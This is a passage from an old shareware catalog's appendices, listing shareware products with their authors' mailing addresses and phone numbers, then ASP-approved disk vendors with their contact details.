800-2424-PSL + Fax: 202-676-4529 + Queries: 202-675-4528 + + Appendix A, "Author addresses" 423 + + + + Product: Federal Express Label Printer + TVSware (Tom Sollas) + Address: 77 Main Avenue, Unit 3A, Ocean Grove NJ 07756 + Orders: 908-774-6402 + Queries: 908-774-6402 + + Product: Brother's Keeper + John Steed + Address: 6907 Childsdale Rd., Rockford, MI 49341 + + Product: Integrity Master(tm), MAZE3 + Stiller Research + Address: 2625 Ridgeway St., Tallahassee, FL 32310 + Orders: 800-788-0787 + Fax: 904-575-7884 + Queries: 904-575-7884 + + Product: CatScan + Rochester Heritage + Address: 72 Knapp Ave. Rochester, NY 14609 + + Product: Bmenu + Mark Strong + Address: 2936 Orchard Knoll Ct, Cincinnati, OH 45239 + Orders: 800-2424-PSL + Fax: 713-524-6398 + + Product: ZZT Arcade-Adventure Game + Potomac Computer Systems + Address: 10406 Holbrook Drive + + Product: LOGIK MENU + LOGIVISION INC. + Address: P.O. Box 396, Sherbrooke, Qc, Canada, J1H 5J7 + Orders: 819-823-6761 + Fax: 819-823-8000 + Queries: 819-823-6761 + + Product: Easy Access + TengWare Enterprises + Address: 28162 Amable, Mission Viejo, CA 92692 + Orders: 714-587-1025 + Queries: 714-587-1025 + + Appendix A, "Author addresses" 424 + + + + Product: dtSearch + DT Software, Inc. + Address: 2101 Crystal Plaza Arcade, Suite 231, Arlington, VA + 22202 + Orders: 800-242-4775 + Fax: 713-524-6398 + + Product: Calculation Solitaire, Canfield For Windows, ZiPaper + Daniel Thomas + Address: 2301 North Huron Circle, Placentia, CA 92670 + Queries: 714-524-5625 + + Product: BCS Menu Program + Bristol Computing Systems, Inc. + Address: Suite 162, 200 Linden Street, P.O. Box 9009, + Wellesley, MA 02181 + + Product: PACE, Probat + Mark Tigges + Address: 2925 Altamont Cresent, West Vancouver, BC, V7V 3B9 + Orders: 604-926-0366 + Queries: 604-926-0366 + + Product: Church Membership Tracking Sys, Home Helper, Smart Home + Shopper + Torbert Data Systems, INC. + Address: P. O. Box 9218 Chesapeake, VA 23321 + Orders: 804-488-5506 + Queries: 804-488-5506 + + Product: Book Librarian, Household Register, Video Librarian + TurboSystemsCo + Address: P.O. Box 965368, Marietta Ga. 30066 + Orders: 404-516-8575 + Queries: 404-516-8575 + + Product: Multilevel Marketing Simulator + LRV Company + Address: PO Box 631, Nesconset, NY 11767 + Queries: 516-360-9178 + + Product: Paint Shop Pro + JASC, Inc. + Address: 17743 Evener Way, Eden Prairie, MN 55346 + Orders: 612-934-7117 + Fax: 612-934-7117 + Queries: 612-934-7117 + + Product: PC-ECAP + Circuit Systems + Address: 418 Church Road, Sicklerville, NJ 08081-1727 + Orders: 800-242-4775 + Queries: 609-875-5433 + + Appendix A, "Author addresses" 425 + + + + Product: SwimBase + Words to Go + Address: 2710 Apple Way, Dunkirk, MD 20754-9705 + Orders: 301-855-6427 + Queries: 301-855-6427 + + Product: ALLY, CADET + Wasco Technical Software + Address: 1211 Grand Junction Drive, Katy, TX 77450 + Orders: 713-392-1359 + Fax: 713-392-1359 + Queries: 713-392-1359 + + Product: AutoCon + Larry Weaver + Address: PO Box 2639, Weaverville, CA 96093-2639 + Orders: 916-623 5045 + Queries: 916-623 5045 + + Product: Family Tree Print Utility + Common Sense Software + Address: 2068 Trailwood Drive Cincinnati, OH 45230-1494 + Orders: 513-231-0730 + Queries: 513-231-0730 + + Product: 4EDIT, 4ZIP/4UNZIP, XDIR + XD Systems + Address: 1014 Shipman Lane, McLean, VA 22101 + Orders: 703-821-3215 + Queries: 703-821-3215 + + Product: Book of Changes, By the Numbers, Citizen, Creativity + Package, Crystal Ball, Curses!, Fortune Teller, Geomancy, Hard + at Work, I.Q. Challenge, LoveDOS, Maillist / M-Label, Mayan + Calendar, Personal Tarot, Poetry Generator, Recap, Richard + Webster Programs, Workbase, Your ESP Test + R.K. West Consulting + Address: P.O. Box 8059, Mission Hills, CA 91346 + Orders: 800-788-0787 + Fax: 314-966-1833 + + Product: CALendar preview for SideKick 2, CALendar RePorT for + SideKick+, CALendar report for TRaVel, Resident Task Manager + WetZoft Applications + Address: 788 Martin Ct West Severn MD 21144-2213 + Orders: 301-969-9385 + Queries: 301-969-9385 + + Product: TAPCIS + Support Group, Inc. + Address: Lake Technology Park, McHenry, MD 21541-0130 + Orders: 800-USA-GROUP + Fax: 301-387-7322 + Queries: 301-387-4500 + + Appendix A, "Author addresses" 426 + + + + Product: Flex + Logical Systems + Address: PO Box 181, Jacksonville AR 72076-0181 + + Product: QPACS, XPENS + Richard A. Williams + Address: P.O. Box 9311, Crystal Lake, IL 60014 + Queries: 815-455-6333 + + Product: DICOGO, DIMANAGE + DI Management Corporation + Address: PO Box 429152, Cincinnati, OH 45242 + Queries: 513-831-4122 + + Product: Command Post, WinBatch, WinCheck, WinEdit + Wilson WindowWare, Inc. + Address: 2701 California Ave SW #212 + Orders: 800-762-8383 + Fax: 206-935-7129 + Queries: 206-937-9335 + + Product: ConvDW, TextCon, TextOut/5 + CrossCourt Systems + Address: 1521 Greenview Ave., East Lansing, MI 48823 + Orders: 517-332-4353 + Queries: 517-332-4353 + + Product: Browse/2 + Wolf Software Design + Address: 6369 Caminito Flecha, San Diego, CA 92111 USA + Orders: 619-292-7706 + Queries: 619-292-7706 + + Product: -=Tab123=-, Custom#Menu, LaunchCAD + Mountain Software + Address: 1579 Nottingham Road, Charleston, WV 25314 + Orders: 800-242-4775 + Queries: 304-744-7748 + + Product: HOME BUDGET MANAGEMENT SYSTEM, The LOTTO SIMULATOR + Brentson Worrell + Address: 6404 Mornay Dr. Tampa, FL 33615 + Orders: 813-886-2282 + Queries: 813-886-2282 + + Product: Movie Guide + SANDD Software + Address: PO Box 3587 Reston VA 22090 + Orders: 800-2424-PSL + Queries: 703-444-8655 + + Appendix A, "Author addresses" 427 + + + + Product: DiscTrak System, MuziTrak System + Blam Entertainment Group + Address: 78 McLennan Way, Kanata ONT K2L 2T2 CANADA + Orders: 613-831-4064 + Queries: 613-831-4064 + + Product: Money Smith + Money Smith Systems + Address: P.O. Box 333 + + Product: MENU ACE + Blue Ace Software + Address: 290 Oakmere Dr. Alpharetta, GA 30201 + + Product: EVA, Listico, PRO$TOCK, PROPLUS + Gateway Software + th + Address: 61 East 8 Street, Suite 128, New York, NY 10003 + + Product: CM_FILER + NoVaSoft + Address: 3239 Riverview Dr., Triangle, VA 22172 + Orders: 703-221-1833 + Queries: 703-221-1833 + + Product: EliteCheck + Taewoong Jeon + Address: P.O. Box 166101, Chicago, IL 60616-6101 + Orders: 800-2424-PSL + + Product: Folders, Sloop Manager + Sloop Software + Address: 6457 Mesedge Lane, Colorado Springs, CO 80919 + Queries: 719-260-0433 + + Product: PCStat + PC Information Systems + Address: 1517 S. Virginia Suite 259, Reno, NV 89502-2807 + Orders: 800-242-4775 + Queries: 702-342-0376 + + Appendix A, "Author addresses" 428 + + + + Product: KEYTREE TOOLBOX, KEYTREE UTILITIES + REWSE CONSULTANTS LIMITED + Address: 44 HORSESHOE ROAD, PANGBOURNE, BERKSHIRE RG8 7JL, UK + Orders: 0734 842443 + + Product: Personal Golf Tracker + John L. Hancock + Address: 2713 Trelawny Dr. Clarksville, TN 37043 + + Product: DOS Extensions for Professional + Allison Software + Address: 166 Shady Lane, Apollo, PA 15613 + Orders: 800-837-1492 + Queries: 412-727-2198 + + Product: BRAINdead2 + Michael Donat + Address: P.O.Box 948 Springdale AR 72765-0948 + Orders: 501-442-0301 + Queries: 501-442-0301 + + Product: Professional Master Key + Public Brand Software + Address: 3750 Kentucky Ave Indianapolis IN 46241 + Orders: 317-856-7571 + Queries: 317-856-7535 + + Product: TransferTIME (TTIME) + RGH Software + Address: Route 1, Box 24 Reed City, MI 49677-9801 + Queries: 616-832-4694 + + Product: PREP + Southwind Software + Address: P.O. Box 273228, Concord Ca., 94527-3228 + + Product: PAGE COUNT, TEACHER, YRWAY, YRWAYx.ZIP + Tinker Software + Address: P.O. Box 3429, Kent, WA 98032 + Fax: 206-852-7708 + + Product: fastmenu GOLD + jwh: SoftWare + Address: PO Box 410, 9500 St.Rt.61, Berlin Heights, OH 44814 + Orders: 419-588-3608 + Queries: 419-588-3608 + + Product: Stable - Technical Graphs + WINTERRA Software Group + Address: PO Box 4106, Highlands Ranch, CO 80126 + Orders: 303-470-6323 + Fax: 303-470-6323 + Queries: 303-470-6323 + + Appendix A, "Author addresses" 429 + + + + Product: Aerosoft Fitness Log + Aerosoft + Address: PO Box 501010, Indianapolis, IN 46256 + Orders: 317-849-7659 + Queries: 317-849-7659 + + Product: Lotto Thunder + Charles P.Staats + Address: P.O. Box 6514, Thousand Oaks, CA., 91359 + + Product: Computer Trivia Quiz + Shoestring Software + Address: P.O. Box 43800, Las Vegas, NV 89116 + + Product: EDWORD + FAGERLUND CONSULTING + Address: Lonsdale West Postal Outlet, Box 54053, North + Vancouver, B.C., CANADA, V7M 3L5 + Orders: 604-984-7330 + Queries: 604-984-7330 + + Product: ACCEL + JSOFT + th + Address: 4108 14 Ave S. + Orders: 612-823-7197 + Queries: 612-823-7197 + + Product: The Better Diet Analyzer + Syntonic Software + Address: 3824 Dunlanwood Circle, Charlotte, NC 28226 + Orders: 800-242-4775 + Queries: 704-542-0473 + + Product: HelpPC Quick Reference Utility + David Jurgens + Address: 1550 Alton Darby Creek Road, Columbus, Ohio 43228 + + Product: Sell More Software + Droege Computing Services, Inc. + Address: 3200 Croasdaile Drive, Ste 304, Durham NC 27705 + Orders: 919-383-9749 + Fax: 919-382-7422 + Queries: 919-383-9749 + + Product: REXL-Lazarillo de Tormes + REXL + Address: 734 Camino Catalina, Solan Beach, CA 92075 + Queries: 619-481-0781 + + Appendix A, "Author addresses" 430 + + + + Product: KP5 + Peter Charpentier + Address: 47 Meeting House Hill Rd, Durham, CT 06422 + + Product: Duplicate File Locator (DFL) + W.S. Ataras Engineering + Address: 40 Laughton St. Upper Marlboro Md. 20772 + Orders: 800-2424-PSL + Queries: 301-249-1141 + + Product: 3 ball Juggler + First Magnitude + Address: 175 E. Alex-Bell Rd. Suite 220-316 Dayton OH 45459 + Queries: 513-436-0232 + + Product: MERIT BADGE TRACKER, PACK TRACKER, PARTY TRACKER, SHIP + TRACKER, TRAINING TRACKER, TROOP TRACKER + Robert Barrentine + Address: 321 1/2 Gorman Avenue; Laurel, MD 20707-4707 + Orders: 301-490-7104 + Queries: 301-490-7104 + + Product: Serial++ Asynch Comm Library + Cortlandt Technologies + Address: P.O. Box 195, Pleasantville NY 10570 + Orders: 914-737-8649 + Queries: 914-737-8649 + + Product: PC Chart (CGA/HGC), PC-CHART (EGA/VGA) + Guru Systems Ltd. + Address: 314 E. Holly #106, Bellingham, WA, 98225-4736 + Orders: 604-299-1010 + Queries: 604-299-1010 + + Product: PUTMAIL, See Mail + Gnosis Inc + Address: 7116 Lory Lane, Lanham, MD 20706-1114 + Orders: 800-359-9998 + + Product: On This Day, Softball Coach + The Software Construction Co. + Address: P.O. Box 160, North Billerica, MA 01862 + + Product: AM-EDIT + PLC Software + Address: 1572 Montgomery Highway; Suite 104D; Birmingham, AL + 35216 + Orders: 205-822-1619 + Queries: 205-822-1619 + + Appendix A, "Author addresses" 431 + + + + Product: CROSSWORD POWER, GRADE BOOK POWER, SURVEY POWER, + WORDSEARCH POWER + WISCO Computing + Address: P.O. Box 8, Wisconsin Rapids, WI 54495-0008 + Orders: 715-423-8189 + Queries: 715-423-8189 + + Product: Jewel Thief + ServantWare + Address: 1426 Brookfield Ann Arbor, MI 48103 + Orders: 313-741-1711 + Queries: 313-741-1711 + + Product: THE MORTGAGE MISER + Practical Solutions + Address: 16541 Redmond Way, Suite 343, Redmond, WA 98052-4463 + Orders: 206-868-3336 + Fax: 206-885-7704 + Queries: 206-868-3336 + + Product: PixFolio Image Catalog System + ACK Software + Address: 298 W. Audubon Drive, Shepherdsville, KY 40165-8836 + Orders: 502-955-7527 + Queries: 502-955-7527 + + Product: METRIC-X + Orion Development Corporation + Address: P. O. Box 2323, Merrifield, VA 22116-2323 + Queries: 800-992-8170 + + Product: First Expedition + Steve Englestad + Address: 9921 Carmel Mountain Road, Suite 301, San Diego, CA + 92129 + + Product: LEANER + MoonStone Software + Address: P.O. Box 32725, Phoenix, AZ 85064 + Orders: 602-955-4266 + Queries: 602-955-4266 + + Product: FlexBase + National MicroSystems + Address: #1210 - 341 Bloor Street West, Toronto, Ontario, + Canada M5S 1W8 + Orders: 416-599-1228 + Queries: 416-599-1228 + + Appendix A, "Author addresses" 432 + + + + Product: Collect! (VGA version) + Alston Software Labs + Address: 1320 Standiford Ave Suite #242 Modesto CA 95350 + Orders: 209-522-8666 + Fax: 209-522-8666 + Queries: 209-522-8666 + + Product: NED + David L. Dight + Address: P.O. Box 280 Kings Cross, N.S.W. 2011 AUSTRALIA. + Fax: +61-2 251-1072 + Queries: +61-2 331-4521 + + Product: Home Sales System + Grumpyware + Address: 9794 Forest Lane, Suite 127, Dallas, TX 75243 + Orders: 214-340-5231 + Queries: 214-340-5231 + + Product: YieldBook + Compound Solutions + Address: 1170 Bower Hill Road - #614, Pittsburgh, PA 15243 + + Product: My Little Realm + My Little Realm + Address: 637 Wyckoff Avenue, Suite 297, Wyckoff, NJ 07481 + + Product: Save the Planet + Save the Planet Software + Address: P.O. Box 45, Pitkin, CO 81241 + Orders: 303-641-5035 + Queries: 303-641-5035 + + Product: ClipMate for Windows + Chris Thornton + Address: PO Box 26263 Rochester, NY 14626 + + Product: $tokTraX + Stoktrax Systems + Address: 2419 Hodges Bend Circle, Sugar Land, TX 77479 + + Product: CROSSDOWN + Sam Bellotto Jr. + Address: 133 Akron Street Rochester, NY 14609-7618 + Orders: 716-482-8092 + Queries: 716-482-8092 + + Product: LambChop + LambWare + th + Address: 6955 29 Terrace North, St Pete, FL 33710 + Orders: 813-525-3162 + Queries: 813-525-3162 + + Appendix A, "Author addresses" 433 + + + + Product: FDplot, HandyDOS + Abri TEchnologies, Inc. + Address: HCR 62, Box 100K, Great Cacapon, WV 25422 + + Product: EASY BANKING + The Durol Company + Address: 5825 Malvern Ave., Burnaby, BC, V5E 3E6, CANADA + Orders: 604-524-1765 + Queries: 604-524-1765 + + Product: PrintEnvelope + Maurer Associates + Address: 15 Lakeside Plaza, 164 Lake Street, Newburgh NY + 12550-5243 + Fax: 914-562-6613 + Queries: 914-562-6600 + + Product: PrinterBUDDY + Lenard Dean + Address: Box 73094, Woodbine Postal Outlet, Calgary, Alberta + T2W6E0 CANADA + + Product: The Cipher-Ace Series + Charles W. Stewart + Address: 1197 Pickerel Cir, Orlando, FL 32839 + Queries: 407-855-6148 + + Product: Tolman Dental Program + Peter T. Smith D.D.S. + Address: 455 Neighborhood Rd. + Orders: 516-281-5544 + Fax: 516-281-5698 + Queries: 516-281-5544 + + Product: NAMEBASE + Elk Creek Software + Address: 13630 Rampart Drive, Conifer, CO 80433-5106 + Orders: 800-242-4775 + Queries: 303-838-5796 + + Product: AC11TO10, PURGE + Software Designs, Inc. + Address: 858 Austerlitz Road, Paris, KY 40361-9055 + Orders: 606-987-6129 + Queries: 606-987-6129 + + Product: Public Address + Paradise Programming + Address: P.O. Box 1231 Shelton, WA 98584-0948 + Orders: 800-847-0309 + Queries: 206-352-9863 + + Appendix A, "Author addresses" 434 + + + + Product: Master Meal Manager, PC-TRACK + Thomas C. Johnson + Address: 9920 S. Palmer Rd., New Carlisle, OH 45344 + Queries: 513-878-9174 + + Product: Decoder!, Filer!, Index!, Swap!, Tag!, TDisplay + Trinity Software + Address: 13550 Frost Drive Nokesville, VA 22123 + Orders: 703-791-2576 + Fax: 703-791-4250 + Queries: 703-791-2576 + + Product: NEWBIZ + Centre for Commercial Innovation (CCI) + Address: P.O. Box 286, 6800 AG Arnhem, HOLLAND + Fax: +31-20.6763706 + + Product: Cumberland Diary, Cumberland Story, Cumberland Tree + Cumberland Software + Address: 404 Corinne Cr, Clarksville, TN 37040 + Queries: 615-647-4012 + + Product: APCAL, CLOCK, FCOMP + Gamma Software + Address: P.O. Box 8191, Fort Collins, CO 80526 + Orders: 800-747-9960 + Queries: 303-667-9960 + + Product: SAFEPACK + D J Harvey Software + Address: PO Box 14, Cardiff CF4 6XW, UNITED KINGDOM + Fax: +44-222 743029 + + Product: CALC_JNC + James N. Cox + Address: 418 Erie Avenue. Quakertown, PA 18951 + + Product: Music Manager for Windows + Joe Herrera + Address: 2405 Westview, Denton, TX 76201 + Queries: 817-382-7585 + + Product: Business Plan Master (IBM), Business Plan Master (Mac) + Grand Universal + Address: 7061 East Wesley Avenue, Denver, CO 80224 + Orders: 303-756-2175 + Queries: 303-756-2175 + + Product: BootMaster + RoSi Software + Address: Keithstr. 4, 1000 Berlin 49, GERMANY + Orders: 011-49-30-744-7707 + Fax: 011-49-30-744-7618 + Queries: 011-49-30-744-7707 + + Appendix A, "Author addresses" 435 + + + + Product: DaMenu + Just-In-Time Computing Services + Address: P.O. Box 4166, Ithaca, NY 14852 + Orders: 607-257-6517 + Queries: 607-257-6517 + + Product: FISHBYTE(tm) + EJM Computer Consulting Ltd. + Address: PO Box 154, East Meadow, NY 11554 + Orders: 516-483-7561 + Queries: 516-483-7561 + + Product: Ethics Awareness, Japanese Business Culture, Service + Business Design + Niche Software + Address: PO Box 2554 Seal Beach, CA 90740-1554 + Queries: 714-892-9052 + + Product: DJ-CHECK, DJ-LOPE, DJ-SLEEVE, LJ-SLEEVE, PM2LINO, PS- + SLEEVE, PS-TEXT + JMJ Software + Address: 5000 Valley Stream Road, Charlotte, NC 28209 + Orders: 704-525-1472 + Queries: 704-525-1472 + + Product: EQUALIZER + Nine-Patch Software + Address: 315 South Alco Avenue, Maryville, MO 64468-2033 + + Product: Textshot + McAdams Associates + Address: P.O. Box 835505, Richardson, TX 75083-5505 + + Product: 4FILES + Hand-Crafted Software + Address: P.O. Box 6001 Sitka, AK 99835 + Orders: 907-747-8996 + Queries: 907-747-8996 + + Product: Calendar Wise + BLUE CANNON SOFTWARE + Address: PO Box 7641, Charlotte, NC 28241-7641 + Orders: 800-779-0850 + Fax: 704-398-0928 + Queries: 704-398-0850 + + Appendix B, "Vendor addresses" 436 + + + + + + Appendix B + Vendor addresses + + This appendix lists each ASP-approved disk vendor. These + vendors have agreed to abide by ethical standards when offering + shareware. + + + $ave On $oftware + Address: PO Box 2837, Wilkes Barre PA 18703 + Phone: 717-824-5452 + + A Drive Software + Address: 7 WATERLOO ROAD, WOODBRIDGE W.A. 6168 AUSTRALIA + Phone: 61-9-592-2624 + + AAT Computer Services + Address: 7 DAYAN DRIVE, WANTIRNA SOUTH VICTORIA 3152 AUSTRALIA + Phone: 011 61 3-8012428 + + AB Club + Address: 13 rue Lacordaire, PARIS 75015 FRANCE + Phone: 33-1-6933-7000 + + Accusoft + Address: 14761 PEARL ROAD STE 309, STRONGSVILLE OH 44136 + Phone: 916-225-2340 + + ACL Shareware + Address: 1601 fulton ave #10, SACRAMENTO CA 95825 + Phone: 916-973-1850 + + Adams Computer Sales + Address: 7322 AVALON DR., FAYETTEVILLE NC 28303-2419 + Phone: 919-867-6181 + + Advantage + Address: 56 BATH ROAD, GLOUCESTERSHIRE GL53 7HJ ENGLAND + Phone: 0242-224340 + + Advantage Plus Distributors + Address: 7113 HALIFAX COURT, TAMPA FL 33615 + Phone: 813-885-1478 + + Affordable Software + Address: 21 BLAXLAND STREET, PO BOX 472, MATRAVILLE NSW 2036 + AUSTRALIA + Phone: 02-311-3539 + + AFL Industries + Address: 213 Ward Circle, Brentwood TN 37027 + Phone: 615-383-1459 + + Appendix B, "Vendor addresses" 437 + + + + Airline Computer Supplies + Address: 869 E SCHAUMBURG RD SUITE 200, SCHAUMBURG IL 60194 + Phone: 708-619-8182 + + Alpha Systems Computer Software + th + Address: 132-117 STREET SOUTH, TACOMA WA 98444-5408 + Phone: 206-535-1995 + + Alphon Edugames + Address: 221 RIDLEY ROAD, BRIDGEMAN DOWNS QLD 4035 AUSTRALIA + Phone: 011 61 72632744 + + Alternative Personal Software + Address: 269 Springside Drive Ste C, HAMILTON ON L9B 1P8 CANADA + Phone: 416-577-4068 + + Andromeda Software, Inc + Address: PO BOX 605, AMHERST NY 14226-0605 + Phone: 716-691-4510 + + Argus Computerized Exchange + Address: 20 MALL ROAD, SUITE 210, BURLINGTON MA 01803 + Phone: 617-674-2354 + + Arnold Company + Address: HWY 1528, RTE 2, BLDG 231, COOPER TX 75432 + Phone: 903-395-2922 + + B.L. Software + Address: PO BOX 13474, CHESAPEAKE VA 23325 + Phone: 804-420-8380 + + Babbage's Inc + Address: 10741 KING WILLIAM DRIVE, DALLAS TX 75220 + Phone: 214-401-9000 + + Barbara's Choice + Address: 44211 20TH ST WEST, LANCASTER CA 93534 + Phone: 805-949-1037 + + Bear Ware + Address: PO BOX 11603, MARINA DEL REY CA 90295-8854 + Phone: 213-822-1376 + + Bee Software Publishing, Inc. + Address: 240 HIGHLAND ST, PO BOX 1179, HAMMOND IN 46320 + Phone: 219-931-3761 + + Best Bits & Bytes + Address: PO Box 8245, Van Nuys CA 91409 + Phone: 818-764-9503 + + Appendix B, "Vendor addresses" 438 + + + + Big Byte Software + Address: 2111 W ARKANSAS LANE #207, ARLINGTON TX 76013 + Phone: 817-265-2007 + + BME Bernhard Marugg + Address: TREPPENWEG 19, ENNETTURGI CH-5300 SWITZERLAND + Phone: 41 56 281075 + + Bonware + Address: PINE-MAPLE STREET, PO BOX 246, MCALISTERVILLE PA 17049 + Phone: 717-463-3030 + + Bright Futures Inc + Address: PO BOX 1030, EAST WINDSOR CT 06088 + Phone: 203-745-5322 + + Bright Idea! Software + Address: 5339 PROSPECT ROAD, SUITE 197, SAN JOSE CA 95129 + Phone: 408-252-0542 + + Brightspark Computers & Pick-A-Disk + Address: 4 RICHARDS PLACE, NORANDA, PERTH 6062 WEST AUSTRALIA + AUSTRALIA + Phone: 011-09-375-1178 + + BroCo Software + Address: Ereprijsstraat 26, Soest Utrecht 3765 AK Netherlands + Phone: 31 2155 26650 + + Budgetware + Address: 9 ALBERMARLE STREET, NEWTOWN NSW 2042 AUSTRALIA + Phone: 011-612-519-4233 + + Bullseye Distributing + Address: 629 WINDSOR GREEN BLVD, GOODLETSVILLE TN 37072 + Phone: 615-859-4371 + + Bureau of Electronic Publishing + Address: 141 NEW ROAD, PARSIPPANY NJ 07054 + Phone: 201-808-2700 + + Bytes and Nibbles + Address: PO BOX 2275, DUNEDIN OTAGO 9001 NEW ZEALAND + Phone: 03-455-3669 + + Bytesaver Software + Address: 1087 CANTERFORD CIRCLE, WESTLAKE VILLAGE CA 91361 + Phone: 805-496-7164 + + Camouflage-Soft + Address: Postfach/POB 761, Sittersweg 85, W-6600 Saarbrucken + GERMANY + Phone: 49/0681/4170330 + + Appendix B, "Vendor addresses" 439 + + + + CC Supplies + Address: 49-6A THE DONWAY WEST, STE 1022, NORTH YORK ON M3C 2E8 + CANADA + Phone: 416-853-9314 + + CDV - NEWSOFT + Address: Ettlinger Str. 5, 7500 Karlsruhe 1 GERMANY + Phone: 0721-22295 + + CELESTIAL PRESS/SOFTWARE + Address: 4424 DOHRCREST DRIVE, NEW PORT RICHEY FL 34652 + Phone: 813-845-8522 or + + Ceramics & Crafts by Marjorie + Address: PO BOX 424, MORGAN HILL CA 95038 + Phone: 408-683-2240 + + Comopharm Ltd T/A PC-SIG + Address: 111-113 WANDSWORTH HIGH ST, LONDON SW18 4WY ENGLAND + Phone: +4481 877 1103 + + Compustuff + Address: 2759 MEDINA RD, PO BOX 58317, MEDINA OH 44258 + Phone: 216-725-7729 + + Computer Bin + Address: PO Box 1826, Perris CA 92571 + Phone: 714-943-7899 + + Computer Bug + Address: 849 IRWIN DRIVE, PITTSBURGH PA 15236 + Phone: 412-882-3374 + + Computer Hut + Address: 1825-F1 TAMIAMI TRAIL, PORT CHARLOTTE FL 33948 + Phone: 813-624-2123 + + Computer Library of New Zealand Ltd. + Address: R.D.3, TIMARU NEW ZEALAND + Phone: +64-3-615-9333 + + Computer Solutions + Address: 181B ROUTE 37, NEW FAIRFIELD CT 06812 + Phone: 203-746-6372 + + Computer Solutions Software Gm + Address: Gartenstr. 2, W-8010 Grafing, F.R.G Bavaria + + Computers International + Address: PO BOX 566085, OCEANSIDE CA 92058 + Phone: 619-630-0055 + + Appendix B, "Vendor addresses" 440 + + + + Crazy Horse Software + Address: 1247 SECOND ST. WEST, CORNWALL ONT K6J 1J2 CANADA + Phone: 613-932-6343 + + Cross Country Shareware + Address: 340 EDINBURGH ROAD NORTH, GUELPH ONTARIO N1H 7Y4 + CANADA + Phone: 519-837-0777 + + CWI Information Services + Address: PO Box 4851, Anaheim CA 92803 + Phone: 714-879-7917 + + D-K Distributing + Address: 1057 W PHILADELPHIA #243, ONTARIO CA 91762 + Phone: 714-590-1038 + + Data Outlet Shareware + Address: PO Box 776, Macon GA 31202-0776 + Phone: 912-743-3732 + + Data Software + Address: PO BOX 10364, CONWAY AR 72032 + Phone: 501-327-0388 + + DataProjects Heidel + Address: Im Huferfeld 5, Dusseldorf 4000 GERMANY + Phone: 211 4180700 + + DBLinx + Address: 1117 MANCHESTER DR., CARY NC 27511 + Phone: 919-469-5196 + + Die Deutsche Software Biblioth + Address: ALPENSTRASSE 52, 8038 GROEBENZELL WEST GERMANY + + Dinastindo Software + Address: J1. Tanjung Duren Raya 23, Jakarta Barat 11470 + INDONESIA + Phone: 0062-21 5668702 + + Dinsdale Industries + Address: 2032 MERIVALE ROAD, NEPEAN ONT K2G 1G6 CANADA + Phone: 613-723-9532 + + Discovery Software + Address: PO BOX 1056, ATTLEBORO MA 02703-0891 + Phone: 508-226-5541 + + Disk Park + Address: 23 EAGLE DRIVE, FLITWICK BEDFORD MK45 1RH ENGLAND + Phone: 44-525-713358 + + Appendix B, "Vendor addresses" 441 + + + + Distant Markets Exports, Import Ltd. + Address: 6520-105 ST, EDMONTON ALBERTA T6H 2N7 CANADA + Phone: 403-436-3009 + + DKR Software + Address: 9 RAYMOND GROVE, WARRADALE SA 5046 AUSTRALIA + Phone: 377-0049 + + Domainsoft + Address: 244 BANK STREET, SOUTH MELBOURNE VICTORIA 3205 + AUSTRALIA + Phone: 61 3 699 8223 + + DP Tool Club + Address: 102 RUE DES FUSILLES, VILLENEUVE D'ASCQ F-59493 FRANCE + Phone: 33-2084-5533 + + Droege Computing Services, Inc. + Address: 3200 CROASDAILE DR., SUITE 304, DURHAM NC 27705 + Phone: 919-383-9749 + + E-Z Software Emporium + Address: 1211 COVENTRY LANE, MURFREESBORO TN 37129 + Phone: 615-895-8934 + + Econo-ware Nederland + Address: Hoffmannlaan 519, Tilburg NB 5011 WK NETERLANDS + Phone: 31 13 563779 + + ElectronArt Design Ltd.(Pocketware) + Address: 78 KIMBERLEY AVENUE, ILFORD ESSEX IG2 7AS ENGLAND + Phone: 081-983-8686 + + Elite Management + Address: 5 MAYFLOWER CRESCENT, HALLETT COVE 5158 SOUTH + AUSTRALIA AUSTRALIA + Phone: 8-381-4851 + + Elite Shareware Labs Inc + Address: 1724 SPRINGHILL RD #C, STAUNTON VA 24401 + Phone: 703 885 0726 + + Encode Business Systems Inc + Address: 434 WEST ST NORTH, ORILLIA ONT L3V 5E8 CANADA + Phone: 705-327-7628 + + Estudio Shareware + Address: RIOBAMBA 436 PISO 3 of 5, CAPITAL FEDERAL 1025 + ARGENTINA + Phone: 541-583-1570 + + Executive Software Inc. + Address: 32 ESTELLA AVE, PITTSBURGH PA 15211 + Phone: 412-481-9792 + + Appendix B, "Vendor addresses" 442 + + + + EZ-Ware + Address: 1832 WOODLAWN DRIVE, MEDFORD OR 97504-7653 + Phone: 503-779-5286 + + Falsoft Inc - Software Shopper + Address: 9509 US HIGHWAY 42, PROSPECT KY 40059 + Phone: 502-228-4492 + + FamilyWare + Address: 2306 CARROLL GROVE DRIVE, TAMPA FL 33612 + Phone: 813-933-8836 + + Finto Software + Address: RT 2, BOX 44, ROSEBUD TX 76570 + Phone: 817-583-2151 + + Flagg's Floppy + Address: 26929 TALL OAKS TRAIL, OLMSTED TOWNSHIP OH 44138 + Phone: 216-235-9407 + + Florida PC Library/Shareware+ + Address: PO Box 491070, Leesburg FL 34749 + Phone: 904-728-8088 + + Forest Park Software + Address: 1527 S MARENGO AVE, FOREST PARK IL 60130-2623 + Phone: 708-366-0705 + + Fox Valley Technical College + Address: 1825 N BLUEMOUND DRIVE, APPLETON WI 54913 + Phone: 414 735 2470 + + Fred's Favourites + Address: PO BOX 2542, DARTMOUTH NOVA SCOTIA B2W 4B7 CANADA + Phone: 902-462-4453 + + Fred's Software + Address: 14220 66TH STREET N, CLEARWATER FL 34624 + Phone: 813-539-8357 + + Gemini Marketing Inc + Address: PO BOX 640, DUVALL WA 98019 + Phone: 206-788-4295 + + Generic Computer Systems + Address: 22612 FOOTHILL BLVD STE 200-C, HAYWARD CA 94541 + Phone: 415-581-1494 + + Generic Software Place Inc + Address: PO BOX 1177, CARMEL IN 46032 + Phone: 317-846-8474 + + Appendix B, "Vendor addresses" 443 + + + + GF Stores Ltd + Address: RR #1, Davis Bay Road/11, Sechelt BC V0N 3A0 CANADA + Phone: 604-885-5025 + + GK Enterprises + Address: 8634 W NATIONAL AVENUE, WEST ALLIS WI 53227 + Phone: 414-546-0111 + + Goodman Enterprises + Address: 16 CONRAD CLOSE, STAFFORDSHIRE ST3 1SW ENGLAND + Phone: 0782 335650 + + Graematter + Address: PO BOX 874, GREENVILLE TX 75403 + Phone: 903-454-3366 + + GVH Computer Services + Address: 768 E. 222ND STREET, BRONX NY 10467 + Phone: 212-798-7738 + + House Of Barlow + Address: 6612 S.KISSIMMEE STREET, TAMPA FL 33616 + Phone: 813-837-9250 + + HRS Software Inc. + Address: 145 ROYAL CREST COURT, 